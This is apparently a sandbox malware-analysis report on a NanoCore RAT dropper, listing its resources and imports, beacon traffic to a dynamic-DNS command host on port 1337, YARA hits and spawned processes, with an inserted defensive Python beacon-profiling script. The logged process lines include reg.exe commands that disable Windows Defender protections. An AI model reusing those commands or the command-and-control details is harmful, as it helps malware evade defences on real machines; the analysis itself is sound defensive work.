          RT_ICON | 0x66558 | 0xea8 | data | English | United States
          RT_ICON | 0x67400 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
          RT_ICON | 0x67868 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | English | United States
          RT_ICON | 0x68910 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | United States
          RT_ICON | 0x6aeb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
          RT_DIALOG | 0x6f588 | 0x286 | data | English | United States
          RT_DIALOG | 0x6f358 | 0x13a | data | English | United States
          RT_DIALOG | 0x6f498 | 0xec | data | English | United States
          RT_DIALOG | 0x6f228 | 0x12e | data | English | United States
          RT_DIALOG | 0x6eef0 | 0x338 | data | English | United States
          RT_DIALOG | 0x6ec98 | 0x252 | data | English | United States
          RT_STRING | 0x6ff68 | 0x1e2 | data | English | United States
          RT_STRING | 0x70150 | 0x1cc | data | English | United States
          RT_STRING | 0x70320 | 0x1b8 | data | English | United States
          RT_STRING | 0x704d8 | 0x146 | Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500 | English | United States
          RT_STRING | 0x70620 | 0x446 | data | English | United States
          RT_STRING | 0x70a68 | 0x166 | data | English | United States
          RT_STRING | 0x70bd0 | 0x152 | data | English | United States
          RT_STRING | 0x70d28 | 0x10a | data | English | United States
          RT_STRING | 0x70e38 | 0xbc | data | English | United States
          RT_STRING | 0x70ef8 | 0xd6 | data | English | United States
          RT_GROUP_ICON | 0x6ec30 | 0x68 | data | English | United States
          RT_MANIFEST | 0x6f810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States

          Imports

          DLL | Imports
          KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
          gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

          Possible Origin

          Language of compilation system | Country where language is spoken
          English | United States

          Network Behavior

          Network Port Distribution

          TCP Packets

          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          May 12, 2021 17:34:12.129079103 CEST | 49708 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:34:15.149733067 CEST | 49708 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:34:21.251131058 CEST | 49708 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:34:27.034090042 CEST | 49716 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:34:30.040508986 CEST | 49716 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:34:36.040991068 CEST | 49716 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:34:44.289757013 CEST | 49726 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:34:47.333580017 CEST | 49726 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:34:53.339256048 CEST | 49726 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:35:01.675276041 CEST | 49735 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:35:04.683994055 CEST | 49735 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:35:10.684426069 CEST | 49735 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:35:19.119381905 CEST | 49745 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:35:22.122889996 CEST | 49745 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:35:28.138998032 CEST | 49745 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:35:36.563344955 CEST | 49747 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:35:39.561831951 CEST | 49747 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:35:45.562311888 CEST | 49747 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:35:53.960721016 CEST | 49752 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:35:56.961658955 CEST | 49752 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:36:02.962279081 CEST | 49752 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:36:11.425970078 CEST | 49753 | 1337 | 192.168.2.6 | 91.109.188.5
          May 12, 2021 17:36:14.416194916 CEST | 49753 | 1337 | 192.168.2.6 | 91.109.188.5

          UDP Packets

          Timestamp                             Src Port  Dst Port  Source IP    Dest IP
          May 12, 2021 17:34:00.918682098 CEST  55074     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:00.969014883 CEST  53        55074     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:03.152108908 CEST  54513     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:03.213664055 CEST  53        54513     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:04.394259930 CEST  62044     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:04.446069002 CEST  53        62044     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:06.391957045 CEST  63791     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:06.453787088 CEST  53        63791     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:08.408325911 CEST  64267     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:08.460005999 CEST  53        64267     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:11.239033937 CEST  49448     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:11.287718058 CEST  53        49448     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:12.057334900 CEST  60342     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:12.118277073 CEST  53        60342     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:17.665268898 CEST  61346     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:17.723392963 CEST  53        61346     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:18.540429115 CEST  51774     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:18.590159893 CEST  53        51774     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:19.743114948 CEST  56023     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:19.794950008 CEST  53        56023     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:20.833920956 CEST  58384     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:20.882561922 CEST  53        58384     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:21.997031927 CEST  60261     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:22.046313047 CEST  53        60261     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:23.758661985 CEST  56061     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:23.810326099 CEST  53        56061     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:25.894366980 CEST  58336     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:25.943238974 CEST  53        58336     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:26.973098993 CEST  53781     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:26.991417885 CEST  54064     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:27.032367945 CEST  53        53781     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:27.043268919 CEST  53        54064     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:28.247889996 CEST  52811     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:28.296665907 CEST  53        52811     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:29.163212061 CEST  55299     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:29.211965084 CEST  53        55299     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:30.065058947 CEST  63745     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:30.113888979 CEST  53        63745     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:31.017595053 CEST  50055     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:31.069360971 CEST  53        50055     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:32.510045052 CEST  61374     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:32.563596964 CEST  53        61374     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:36.353895903 CEST  50339     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:36.425498962 CEST  53        50339     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:40.374931097 CEST  63307     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:40.437545061 CEST  53        63307     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:44.226249933 CEST  49694     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:44.287868977 CEST  53        49694     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:54.929163933 CEST  54982     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:54.988718033 CEST  53        54982     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:57.327316999 CEST  50010     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:57.497487068 CEST  53        50010     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:58.144382954 CEST  63718     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:58.204665899 CEST  53        63718     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:58.844790936 CEST  62116     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:58.951014996 CEST  53        62116     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:59.256097078 CEST  63816     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:59.329811096 CEST  53        63816     8.8.8.8      192.168.2.6
          May 12, 2021 17:34:59.524442911 CEST  55014     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:34:59.584713936 CEST  53        55014     8.8.8.8      192.168.2.6
          May 12, 2021 17:35:00.446893930 CEST  62208     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:35:00.506010056 CEST  53        62208     8.8.8.8      192.168.2.6
          May 12, 2021 17:35:01.463380098 CEST  57574     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:35:01.521243095 CEST  53        57574     8.8.8.8      192.168.2.6
          May 12, 2021 17:35:01.624326944 CEST  51818     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:35:01.673527956 CEST  53        51818     8.8.8.8      192.168.2.6
          May 12, 2021 17:35:02.005443096 CEST  56628     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:35:02.062946081 CEST  53        56628     8.8.8.8      192.168.2.6
          May 12, 2021 17:35:03.111558914 CEST  60778     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:35:03.160286903 CEST  53        60778     8.8.8.8      192.168.2.6
          May 12, 2021 17:35:04.374131918 CEST  53799     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:35:04.425746918 CEST  53        53799     8.8.8.8      192.168.2.6
          May 12, 2021 17:35:04.876533031 CEST  54683     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:35:04.933768034 CEST  53        54683     8.8.8.8      192.168.2.6
          May 12, 2021 17:35:13.430619001 CEST  59329     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:35:13.489897966 CEST  53        59329     8.8.8.8      192.168.2.6
          May 12, 2021 17:35:18.937272072 CEST  64021     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:35:18.998645067 CEST  53        64021     8.8.8.8      192.168.2.6
          May 12, 2021 17:35:36.497963905 CEST  56129     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:35:36.559180975 CEST  53        56129     8.8.8.8      192.168.2.6
          May 12, 2021 17:35:38.139394045 CEST  58177     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:35:38.203593016 CEST  53        58177     8.8.8.8      192.168.2.6
          May 12, 2021 17:35:45.169580936 CEST  50700     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:35:45.243531942 CEST  53        50700     8.8.8.8      192.168.2.6
          May 12, 2021 17:35:46.837815046 CEST  54069     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:35:46.904702902 CEST  53        54069     8.8.8.8      192.168.2.6
          May 12, 2021 17:35:53.896083117 CEST  61178     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:35:53.954693079 CEST  53        61178     8.8.8.8      192.168.2.6
          May 12, 2021 17:36:11.321028948 CEST  57017     53        192.168.2.6  8.8.8.8
          May 12, 2021 17:36:11.385448933 CEST  53        57017     8.8.8.8      192.168.2.6

          DNS Queries

          Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                    Type            Class
          May 12, 2021 17:34:12.057334900 CEST  192.168.2.6  8.8.8.8  0x226b    Standard query (0)  likedoingthis.ddns.net  A (IP address)  IN (0x0001)
          May 12, 2021 17:34:26.973098993 CEST  192.168.2.6  8.8.8.8  0xce70    Standard query (0)  likedoingthis.ddns.net  A (IP address)  IN (0x0001)
          May 12, 2021 17:34:44.226249933 CEST  192.168.2.6  8.8.8.8  0xe267    Standard query (0)  likedoingthis.ddns.net  A (IP address)  IN (0x0001)
          May 12, 2021 17:35:01.624326944 CEST  192.168.2.6  8.8.8.8  0x2d61    Standard query (0)  likedoingthis.ddns.net  A (IP address)  IN (0x0001)
          May 12, 2021 17:35:18.937272072 CEST  192.168.2.6  8.8.8.8  0x59ef    Standard query (0)  likedoingthis.ddns.net  A (IP address)  IN (0x0001)
          May 12, 2021 17:35:36.497963905 CEST  192.168.2.6  8.8.8.8  0xce2e    Standard query (0)  likedoingthis.ddns.net  A (IP address)  IN (0x0001)
          May 12, 2021 17:35:53.896083117 CEST  192.168.2.6  8.8.8.8  0x546d    Standard query (0)  likedoingthis.ddns.net  A (IP address)  IN (0x0001)
          May 12, 2021 17:36:11.321028948 CEST  192.168.2.6  8.8.8.8  0x724e    Standard query (0)  likedoingthis.ddns.net  A (IP address)  IN (0x0001)

          DNS Answers

          Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                    CName  Address       Type            Class
          May 12, 2021 17:34:12.118277073 CEST  8.8.8.8    192.168.2.6  0x226b    No error (0)  likedoingthis.ddns.net  -      91.109.188.5  A (IP address)  IN (0x0001)
          May 12, 2021 17:34:27.032367945 CEST  8.8.8.8    192.168.2.6  0xce70    No error (0)  likedoingthis.ddns.net  -      91.109.188.5  A (IP address)  IN (0x0001)
          May 12, 2021 17:34:44.287868977 CEST  8.8.8.8    192.168.2.6  0xe267    No error (0)  likedoingthis.ddns.net  -      91.109.188.5  A (IP address)  IN (0x0001)
          May 12, 2021 17:35:01.673527956 CEST  8.8.8.8    192.168.2.6  0x2d61    No error (0)  likedoingthis.ddns.net  -      91.109.188.5  A (IP address)  IN (0x0001)
          May 12, 2021 17:35:18.998645067 CEST  8.8.8.8    192.168.2.6  0x59ef    No error (0)  likedoingthis.ddns.net  -      91.109.188.5  A (IP address)  IN (0x0001)
          May 12, 2021 17:35:36.559180975 CEST  8.8.8.8    192.168.2.6  0xce2e    No error (0)  likedoingthis.ddns.net  -      91.109.188.5  A (IP address)  IN (0x0001)
          May 12, 2021 17:35:53.954693079 CEST  8.8.8.8    192.168.2.6  0x546d    No error (0)  likedoingthis.ddns.net  -      91.109.188.5  A (IP address)  IN (0x0001)
          May 12, 2021 17:36:11.385448933 CEST  8.8.8.8    192.168.2.6  0x724e    No error (0)  likedoingthis.ddns.net  -      91.109.188.5  A (IP address)  IN (0x0001)
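          Read together, the TCP and DNS tables describe one behaviour: every connection to 91.109.188.5:1337 is preceded by an A lookup of likedoingthis.ddns.net between 2 ms and 121 ms earlier, every source port carries packets at +0 s, +3 s and +9 s and the peer never sends anything back, and a fresh source port appears roughly every 17 s. The Python below is an added example, not part of the Joe Sandbox report; it rebuilds that profile from the rows of the two tables (timestamps cut to microseconds because datetime has no nanosecond field). The dynamic-DNS suffix list, the common-port set and the two-second lookup window are this example's assumptions, not values taken from the report.

```python
"""Beacon profile rebuilt from the TCP and DNS tables above.

Added example, not part of the Joe Sandbox report. Packet and answer records
are the rows of the "TCP Packets" and "DNS Answers" tables (timestamps cut to
microseconds); the dynamic-DNS suffixes, the common-port set and the lookup
window are this example's assumptions.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median

SANDBOX_HOST = "192.168.2.6"
C2_IP = "91.109.188.5"
DYNAMIC_DNS_SUFFIXES = (".ddns.net", ".no-ip.org", ".duckdns.org")  # assumption: minimal list
COMMON_PORTS = {80, 443, 8080, 8443}  # assumption: expected outbound ports for a workstation
_DAY = "2021-05-12 "

# (timestamp, src_port, dst_port, src_ip, dst_ip); every row of the table is host -> C2:1337
TCP_PACKETS = [(_DAY + t, p, 1337, SANDBOX_HOST, C2_IP) for t, p in [
    ("17:34:12.129079", 49708), ("17:34:15.149733", 49708), ("17:34:21.251131", 49708),
    ("17:34:27.034090", 49716), ("17:34:30.040508", 49716), ("17:34:36.040991", 49716),
    ("17:34:44.289757", 49726), ("17:34:47.333580", 49726), ("17:34:53.339256", 49726),
    ("17:35:01.675276", 49735), ("17:35:04.683994", 49735), ("17:35:10.684426", 49735),
    ("17:35:19.119381", 49745), ("17:35:22.122889", 49745), ("17:35:28.138998", 49745),
    ("17:35:36.563344", 49747), ("17:35:39.561831", 49747), ("17:35:45.562311", 49747),
    ("17:35:53.960721", 49752), ("17:35:56.961658", 49752), ("17:36:02.962279", 49752),
    ("17:36:11.425970", 49753), ("17:36:14.416194", 49753),
]]

# (timestamp, name, address) for the eight A answers in the DNS Answers table
DNS_ANSWERS = [(_DAY + t, "likedoingthis.ddns.net", C2_IP) for t in [
    "17:34:12.118277", "17:34:27.032367", "17:34:44.287868", "17:35:01.673527",
    "17:35:18.998645", "17:35:36.559180", "17:35:53.954693", "17:36:11.385448",
]]


def _ts(text):
    return datetime.fromisoformat(text)


def connection_attempts(packets, host=SANDBOX_HOST):
    """One connect() attempt per outbound 4-tuple; offsets are seconds after its first packet."""
    flows = defaultdict(list)
    for ts, sport, dport, sip, dip in packets:
        if sip == host:
            flows[(dip, dport, sport)].append(_ts(ts))
    attempts = []
    for (dip, dport, sport), times in flows.items():
        times.sort()
        attempts.append({"dst_ip": dip, "dst_port": dport, "src_port": sport, "first": times[0],
                         "offsets": [round((t - times[0]).total_seconds(), 3) for t in times]})
    return sorted(attempts, key=lambda a: a["first"])


def reply_packets(packets, host=SANDBOX_HOST):
    """Packets not originated by the sandbox host, i.e. anything the peer sent back."""
    return [p for p in packets if p[3] != host]


def resolver_for(attempt, answers, window_s=2.0):
    """(name, lag) of the latest A answer for the target address inside window_s before the SYN."""
    best = None
    for ts, name, addr in answers:
        lag = (attempt["first"] - _ts(ts)).total_seconds()
        if addr == attempt["dst_ip"] and 0 <= lag <= window_s and (best is None or lag < best[1]):
            best = (name, lag)
    return best


def profile(packets, answers):
    """Per destination: attempt count, packets per attempt, retry offsets, cadence, resolver chain."""
    by_dst = defaultdict(list)
    for a in connection_attempts(packets):
        by_dst[(a["dst_ip"], a["dst_port"])].append(a)
    replies = reply_packets(packets)
    result = {}
    for (ip, port), atts in by_dst.items():
        starts = [a["first"] for a in atts]
        gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
        resolved = [resolver_for(a, answers) for a in atts]
        names = {r[0] for r in resolved if r}
        result[f"{ip}:{port}"] = {
            "attempts": len(atts),
            "packets_per_attempt": [len(a["offsets"]) for a in atts],
            "retry_offsets": [a["offsets"] for a in atts],
            "replies": sum(1 for p in replies if p[3] == ip),
            "median_gap_s": round(median(gaps), 1) if gaps else None,
            "resolved_names": sorted(names),
            "max_dns_lag_s": round(max(r[1] for r in resolved if r), 3) if any(resolved) else None,
            "dynamic_dns": any(n.endswith(DYNAMIC_DNS_SUFFIXES) for n in names),
            "nonstandard_port": port not in COMMON_PORTS,
        }
    return result


def reasons(finding):
    """Triage reasons for one destination's profile, in the order an analyst would cite them."""
    out = []
    if finding["attempts"] >= 3 and finding["median_gap_s"] is not None:
        out.append(f"{finding['attempts']} connection attempts, median gap {finding['median_gap_s']} s (beaconing)")
    if finding["replies"] == 0:
        out.append("no packets from the peer: SYNs retransmitted and never answered")
    if finding["dynamic_dns"]:
        out.append("target resolved via dynamic DNS: " + ", ".join(finding["resolved_names"]))
    if finding["nonstandard_port"]:
        out.append("non-standard destination port")
    return out


if __name__ == "__main__":
    for dst, f in profile(TCP_PACKETS, DNS_ANSWERS).items():
        print(dst, f["packets_per_attempt"], *reasons(f), sep="\n  ")
```

          Eight attempts, zero reply packets and three packets per attempt at +3 s and +9 s is the shape of a SYN retransmitted to a host that never answered; the last attempt shows only two packets because the capture ended at 17:36:14. Because the peer never responded, the traffic establishes the beacon cadence and the name-to-address chain, not the NanoCore protocol itself, so a network signature built from this run should key on the resolver pattern and the 1337/tcp destination rather than on payload bytes.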

          Code Manipulations

          Statistics

          Behavior


          System Behavior

          General

          Start time:17:34:07
          Start date:12/05/2021
          Path:C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe'
          Imagebase:0x1310000
          File size:527393 bytes
          MD5 hash:01D32B29CF20B16E7DC745F01168BDD5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low

          General

          Start time:17:34:09
          Start date:12/05/2021
          Path:C:\Users\user\Desktop\Main.exe
          Wow64 process (32bit):false
          Commandline:'C:\Users\user\Desktop\Main.exe'
          Imagebase:0x140000000
          File size:123904 bytes
          MD5 hash:443089CA423FC51A74E6F64B4A910E04
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 32%, ReversingLabs
          Reputation:low

          General

          Start time:17:34:09
          Start date:12/05/2021
          Path:C:\Users\user\Desktop\Service.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\Service.exe'
          Imagebase:0x900000
          File size:207360 bytes
          MD5 hash:A54512682E96BF7475C189E0D85C4B1F
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.604469931.0000000005310000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.604469931.0000000005310000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\Desktop\Service.exe, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\Desktop\Service.exe, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\Service.exe, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\Service.exe, Author: Kevin Breen <kevin@techanarchy.net>
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 100%, Joe Sandbox ML
          • Detection: 98%, ReversingLabs
          Reputation:low

          General

          Start time:17:34:10
          Start date:12/05/2021
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.bat C:\Users\user\Desktop\Main.exe'
          Imagebase:0x7ff7180e0000
          File size:273920 bytes
          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:17:34:10
          Start date:12/05/2021
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff61de10000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:17:34:10
          Start date:12/05/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:Reg.exe query 'HKU\S-1-5-19\Environment'
          Imagebase:0x7ff669b10000
          File size:72704 bytes
          MD5 hash:E3DACF0B31841FA02064B4457D44B357
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          General

          Start time:17:34:12
          Start date:12/05/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Imagebase:0x7ff669b10000
          File size:72704 bytes
          MD5 hash:E3DACF0B31841FA02064B4457D44B357
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate

          General

          Start time:17:34:13
          Start date:12/05/2021
          Path:C:\Windows\System32\reg.exe
          Wow64 process (32bit):false
          Commandline:Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableBehaviorMonitoring' /t REG_DWORD /d '1' /f
          Imagebase:0x7ff669b10000
          File size:72704 bytes
          MD5 hash:E3DACF0B31841FA02064B4457D44B357
